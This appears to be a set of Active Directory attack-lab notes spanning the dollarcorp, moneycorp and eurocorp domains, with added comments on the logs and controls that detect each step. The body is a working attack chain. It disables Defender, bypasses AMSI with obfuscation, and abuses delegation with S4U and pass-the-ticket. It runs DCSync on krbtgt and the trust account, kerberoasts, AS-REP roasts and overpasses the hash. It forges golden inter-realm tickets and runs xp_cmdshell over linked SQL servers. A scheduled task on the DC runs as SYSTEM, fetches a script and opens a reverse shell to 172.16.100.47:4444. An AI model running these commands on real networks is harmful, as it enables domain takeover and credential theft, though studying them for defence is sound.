PS Commands
# AD attack-lab notes (dollarcorp / moneycorp / eurocorp). This is not a
# runnable script: it mixes PowerShell, kekeo/Rubeus/mimikatz syntax and raw
# T-SQL, several commands are wrapped across lines, one line is truncated, and
# some lines are free-text notes. Hostnames, hashes and SIDs are lab artifacts
# taken from these notes. Added comments are defender-oriented: where each step
# leaves a trace and which control blunts it.

# PSRemoting session to "Server1" (placeholder host). WinRM use is recorded in
# the WinRM operational log on the target and, with script block logging on,
# as PowerShell 4104 events. NOTE: the dash before Computername is an en-dash
# as pasted, not an ASCII hyphen.
$session=New-PSSession –Computername Server1
Enter-PSSession $session
# Defender tamper: turns off real-time monitoring. Tamper Protection blocks
# this call, and the state change is written to the Defender operational log.
Set-MpPreference -DisableRealtimeMonitoring $true
# Read-only recon: effective AppLocker rule collections and the session's
# language mode (ConstrainedLanguage is the control that stops the .NET
# reflection used later in these notes).
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$ExecutionContext.SessionState.LanguageMode
#Enum Applocker policy if you stumble upon constrained language mode
# Tool drop onto the C$ admin share of dcorp-adminsrv. With object-access
# auditing enabled, share writes surface as 5145 events on the host. The second
# line is a template with <Path> / <Destination> placeholders.
Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
Copy-Item <Path> <Destination>\c$\'Program Files'
#Ask for TGT from server using kekeo
# kekeo syntax, not PowerShell: a TGT for websvc from its RC4 key, then S4U to
# obtain a service ticket as Administrator (constrained-delegation abuse).
# Blunted by "Account is sensitive and cannot be delegated" / Protected Users
# on privileged accounts and by not leaving RC4 enabled for the account;
# 4769 events with etype 0x17 (RC4) naming a privileged user are the hook.
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
#Ask for a TGS
# One command wrapped across the next three lines as pasted.
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR
CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local
/service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
#PASS THE TICKET USING MIMIKATZ
# Injects the obtained service ticket into the current logon session; one
# command wrapped across three lines as pasted.
Invoke-Mimikatz -Command '"kerberos::ptt
TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~
dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
#DCSync (not an lsass dump): replicates dcorp\krbtgt secrets from the DC.
# Directory replication requested from a non-DC host is the signal: 4662 on
# the DC for the DS-Replication-Get-Changes rights with a workstation/server
# as the source. Requires replication rights on the domain object.
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
# Remote WMI recon against the DC (needs admin rights on the DC).
gwmi -Class win32_computersystem -ComputerName dcorpdc.dollarcorp.moneycorp.local
# find out services running with user accounts as the services running with machine accounts have difficult passwords
# Kerberoasting: list user accounts carrying SPNs, then request a service
# ticket whose encrypted part is cracked offline. The New-Object line below is
# truncated in these notes (unterminated string). Mitigation: gMSA or long
# random passwords plus AES-only for SPN-bearing accounts; detect 4769 RC4
# requests for user-account SPNs.
Get-NetUser -SPN
# Request ticket for the service
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.loca
# AS-REP roasting. Set-DomainObject flips userAccountControl bit 0x400000
# (DONT_REQ_PREAUTH = 4194304) on ControlXUser; that directory write (4738 /
# 5136 on the DC) is a stronger detection signal than the roast itself.
Get-DomainUser -PreauthNotRequired -Verbose
Set-DomainObject -Identity ControlXUser -XOR @ {useraccountcontrol=4194304} -Verbose
Get-DomainUser -PreauthNotRequired -Verbose -Identity Control47User
Get-ASREPHash -UserName VPN1user -Verbose
# Bare UNC paths on the next lines are host notes, not commands.
\\dcorp-dc.dollarcorp.moneycorp.local
# Overpass-the-hash: Administrator's NTLM hash into a fresh powershell.exe.
# sekurlsa::pth produces a NewCredentials (type 9) logon, a 4624 on the
# source host; Credential Guard / Protected Users remove the reusable secret.
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorpdc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'
\\dcorp-appsrv.dollarcorp.moneycorp.local
# Remote scheduled task on the DC running as SYSTEM; the /TR payload fetches a
# script over plain HTTP from 172.16.100.47 and connects back to port 4444.
# Task creation logs 4698 and the TaskScheduler operational channel; outbound
# HTTP and a 4444 connection from a DC are the network tell.
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "black47"
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "black47" /TR "powershell.exe -c 'iex(New-Object Net.WebClient).DownloadString(''http://172.16.100.47/Invoke-PowerShellTcp.ps1''')'';Power -Reverse -IPAddress 172.16.100.47 -Port 4444"
# Obfuscated AMSI bypass (format-string and backtick evasion). Script block
# logging (4104) records the block regardless of the obfuscation, and Defender
# flags the amsiInitFailed pattern; real-time monitoring is disabled again on
# the following line.
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Set-MpPreference -DisableRealtimeMonitoring $true
# DCSync of the trust account mcorp$ yields the inter-realm trust key noted
# below; same 4662 replication signal as above.
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
# Free-text notes: the trust key and the SIDs used in the forged tickets.
# RID 519 is Enterprise Admins. This material is tier-0 secret data.
Trust token - 776b4d2c86b0dd0c79cab6511728264f
domain sid - S-1-5-21-1874506631-3219952063-538504511
EA - SIDS - S-1-5-21-280534878-1496970234-700767426-519
EU EA SIDS - S-1-5-21-1652071801-1423090587-98612180-519
Get-NetGroup -Domain moneycorp.local -GroupName "Enterprise Admins" -FullData
# Forged inter-realm TGT carrying an extra Enterprise Admins SID, signed with
# the trust key (lsadump::trust /patch reads it). This block targets
# eurocorp.local (a separate forest); the later one targets the parent domain
# moneycorp.local. Across a forest trust, SID filtering / quarantine strips the
# injected SID; inside the forest SID history from a child is honoured, which
# is why the forest, not the domain, is the security boundary.
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:776b4d2c86b0dd0c79cab6511728264f /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
# Rubeus: exchanges the forged ticket for a CIFS service ticket on mcorp-dc and
# injects it into the session.
\Rubeus.exe asktgs /ticket:C:trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorpdc.moneycorp.local /ptt
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid: S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:433e7fd056a2b3512efb341590d7c436 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
# Persistence: grants student47 remote WMI access on the DC's root\cimv2
# namespace by editing namespace security. Namespace ACL changes on a DC are
# rare and worth auditing.
Set-RemoteWMI -SamAccountName student47 -ComputerName dcorpdc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose
# Older kekeo tooling for the same trust-ticket -> CIFS ticket flow; the final
# directory listing of mcorp-dc C$ is the proof, visible as 5145 on mcorp-dc
# from a child-domain host.
\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$
# SQL Server link abuse: enumerate and crawl linked servers from dcorp-mssql,
# then run xp_cmdshell through the chain out to eu-sql. Mitigations: keep
# xp_cmdshell disabled, avoid links whose mapped login is sysadmin, and audit
# linked-server logins. The final line is raw T-SQL (nested openquery), not
# PowerShell.
Get-SQLServerLink -Instance dcorp-mssql -Verbose
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'"
select * from openquery("dcorp-sql1",'select * from openquery("dcorpm-gmt",''select * from openquery("eu-sql.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "powershell whoami)'''')'')')